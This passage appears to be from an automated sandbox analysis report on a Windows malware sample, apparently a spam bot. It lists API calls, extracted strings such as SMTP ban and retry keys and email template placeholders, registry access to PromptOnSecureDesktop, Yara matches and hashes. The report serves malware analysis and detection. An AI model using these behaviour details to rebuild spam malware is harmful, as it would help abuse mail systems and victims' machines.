                                                                                        • RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
                                                                                        • RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
                                                                                        • RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseOpenQuery
                                                                                        • String ID: PromptOnSecureDesktop$localcfg
                                                                                        • API String ID: 237177642-1678164370
                                                                                        • Opcode ID: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
                                                                                        • Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
                                                                                        • Opcode Fuzzy Hash: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
                                                                                        • Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                        • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                        • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                        • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                        • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                        • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                        • API String ID: 835516345-270533642
                                                                                        • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                        • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                        • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                        • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 0261865A
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 0261867B
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 026186A8
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 026186B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseOpenQuery
                                                                                        • String ID: "$PromptOnSecureDesktop
                                                                                        • API String ID: 237177642-3108538426
                                                                                        • Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                        • Instruction ID: 7321bf279ce5c8db16d4deb5f206279f022fb133ddab661458120649b34cf447
                                                                                        • Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                        • Instruction Fuzzy Hash: 20C1B271900248BEFB11EBA4DC85EEF7BBDEF04304F184069F604E3150EB71AA949B69
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 02611601
                                                                                        • lstrlenW.KERNEL32(-00000003), ref: 026117D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShelllstrlen
                                                                                        • String ID: $<$@$D
                                                                                        • API String ID: 1628651668-1974347203
                                                                                        • Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                        • Instruction ID: fb05c152851a36c5fba60b57d09640f8df2a5e6e85837152509572213412e399
                                                                                        • Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                        • Instruction Fuzzy Hash: FEF18EB15083419FD720CF64C888BABBBE5FB8A304F04896DF69997390D7B4E944CB56
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 026176D9
                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 02617757
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 0261778F
                                                                                        • ___ascii_stricmp.LIBCMT ref: 026178B4
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0261794E
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0261796D
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0261797E
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 026179AC
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02617A56
                                                                                          • Part of subcall function 0261F40C: lstrlen.KERNEL32(000000E4,00000000,PromptOnSecureDesktop,000000E4,0261772A,?), ref: 0261F414
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 026179F6
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02617A4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                        • String ID: "$PromptOnSecureDesktop
                                                                                        • API String ID: 3433985886-3108538426
                                                                                        • Opcode ID: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                        • Instruction ID: 85714b4c115e1a531b6a0ce289825e617556dde5b282e38d512eaa8c77b1b569
                                                                                        • Opcode Fuzzy Hash: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                        • Instruction Fuzzy Hash: 23C19571900249AFDB12DFA4DC45FEEBBB9EF49310F1844A5E504E6290EB71EA84CF64
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02612CED
                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 02612D07
                                                                                        • htons.WS2_32(00000000), ref: 02612D42
                                                                                        • select.WS2_32 ref: 02612D8F
                                                                                        • recv.WS2_32(?,00000000,00001000,00000000), ref: 02612DB1
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02612E62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateProcesshtonsrecvselectsocket
                                                                                        • String ID:
                                                                                        • API String ID: 127016686-0
                                                                                        • Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                        • Instruction ID: a9e80077326e2c97af85a1a92b158be880c006ff6459b67855971a107850e935
                                                                                        • Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                        • Instruction Fuzzy Hash: 2261E471904325AFC3209F64DC58B6BBBE8FB84745F08481DFD4497290D7B4E881CBA6
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                          • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                          • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                          • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                          • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                          • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                          • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                        • wsprintfA.USER32 ref: 0040AEA5
                                                                                          • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                        • wsprintfA.USER32 ref: 0040AE4F
                                                                                        • wsprintfA.USER32 ref: 0040AE5E
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                        • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                        • API String ID: 3631595830-1816598006
                                                                                        • Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                        • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                        • Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                        • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(iphlpapi.dll,759223A0,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                        • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                        • htons.WS2_32(00000035), ref: 00402E88
                                                                                        • inet_addr.WS2_32(?), ref: 00402E93
                                                                                        • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                        • String ID: GetNetworkParams$iphlpapi.dll
                                                                                        • API String ID: 929413710-2099955842
                                                                                        • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                        • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                        • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                        • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?), ref: 026195A7
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 026195D5
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 026195DC
                                                                                        • wsprintfA.USER32 ref: 02619635
                                                                                        • wsprintfA.USER32 ref: 02619673
                                                                                        • wsprintfA.USER32 ref: 026196F4
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 02619758
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 0261978D
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 026197D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 3696105349-2980165447
                                                                                        • Opcode ID: 0ac1c7cf1312716136e7fb6a36e28e3fd6dbc7c146b39f469b2464a0e942be83
                                                                                        • Instruction ID: d7379f3dfab5426c98f2bbbab882f332f287a5967254d63b8ed3c8fb613448dc
                                                                                        • Opcode Fuzzy Hash: 0ac1c7cf1312716136e7fb6a36e28e3fd6dbc7c146b39f469b2464a0e942be83
                                                                                        • Instruction Fuzzy Hash: C0A19DB1900248AFEB25DFA0CC55FDA3BADEF04741F18442AFA05E2251E7B5E584CFA4
                                                                                        APIs
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID: 06A$46A$86A$smtp_ban$smtp_herr$smtp_retr
                                                                                        • API String ID: 1586166983-142018493
                                                                                        • Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                        • Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
                                                                                        • Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                        • Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 0040B467
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$wsprintf
                                                                                        • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                        • API String ID: 1220175532-2340906255
                                                                                        • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                        • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                        • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                        • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32 ref: 0261202D
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 0261204F
                                                                                        • GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 0261206A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02612071
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 02612082
                                                                                        • GetTickCount.KERNEL32 ref: 02612230
                                                                                          • Part of subcall function 02611E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 02611E7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                        • String ID: flags_upd$hi_id$localcfg$work_srv
                                                                                        • API String ID: 4207808166-1391650218
                                                                                        • Opcode ID: a6853c32b60f2cc87b9b05c4564022504dbed896d64d3d62fe446b684c9c1410
                                                                                        • Instruction ID: 039ddd67e863803909d2b0e88280d501452e4102ada36487f2ca94c3244c71c3
                                                                                        • Opcode Fuzzy Hash: a6853c32b60f2cc87b9b05c4564022504dbed896d64d3d62fe446b684c9c1410
                                                                                        • Instruction Fuzzy Hash: 7D5193B0500784AFE330AF758C85F67BAECEB55704F08491DFE9682242D7B9B584CB69
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00402078
                                                                                        • GetTickCount.KERNEL32 ref: 004020D4
                                                                                        • GetTickCount.KERNEL32 ref: 004020DB
                                                                                        • GetTickCount.KERNEL32 ref: 0040212B
                                                                                        • GetTickCount.KERNEL32 ref: 00402132
                                                                                        • GetTickCount.KERNEL32 ref: 00402142
                                                                                          • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,7508EA50,80000001,00000000,0040E513,?,?,?,?,000000E4), ref: 0040F089
                                                                                          • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,7508EA50,80000001,00000000,0040E513,?,?,?,?,000000E4,000000C8), ref: 0040F093
                                                                                          • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                          • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                          • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                        • String ID: localcfg$net_type$rbl_bl$rbl_ip
                                                                                        • API String ID: 3976553417-1522128867
                                                                                        • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                        • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                        • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                        • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                        APIs
                                                                                        • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                        • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: closesockethtonssocket
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 311057483-2401304539
                                                                                        • Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                        • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                        • Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                        • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                        APIs
                                                                                          • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                          • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                        • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                        • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                        • GetTickCount.KERNEL32 ref: 0040C363
                                                                                        • GetTickCount.KERNEL32 ref: 0040C378
                                                                                        • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                        • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0040C4E0), ref: 0040C4C1
                                                                                        • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1553760989-1857712256
                                                                                        • Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                        • Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
                                                                                        • Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                        • Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 02613068
                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02613078
                                                                                        • GetProcAddress.KERNEL32(00000000,00410408), ref: 02613095
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 026130B6
                                                                                        • htons.WS2_32(00000035), ref: 026130EF
                                                                                        • inet_addr.WS2_32(?), ref: 026130FA
                                                                                        • gethostbyname.WS2_32(?), ref: 0261310D
                                                                                        • HeapFree.KERNEL32(00000000), ref: 0261314D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                        • String ID: iphlpapi.dll
                                                                                        • API String ID: 2869546040-3565520932
                                                                                        • Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                        • Instruction ID: fc02ab6c0b078852ac8506933ec1da377780785ae70f8c1e57317adc72346d45
                                                                                        • Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                        • Instruction Fuzzy Hash: 4D310A31A00306ABDF119BB49C49BAE7BB8EF05324F1841A5F919E3390DB74E551CB58
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                        • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                        • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                        • String ID: DnsQuery_A$dnsapi.dll
                                                                                        • API String ID: 3560063639-3847274415
                                                                                        • Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                        • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                        • Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                        • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                        • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$PromptOnSecureDesktop$kernel32
                                                                                        • API String ID: 1082366364-2834986871
                                                                                        • Opcode ID: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                        • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
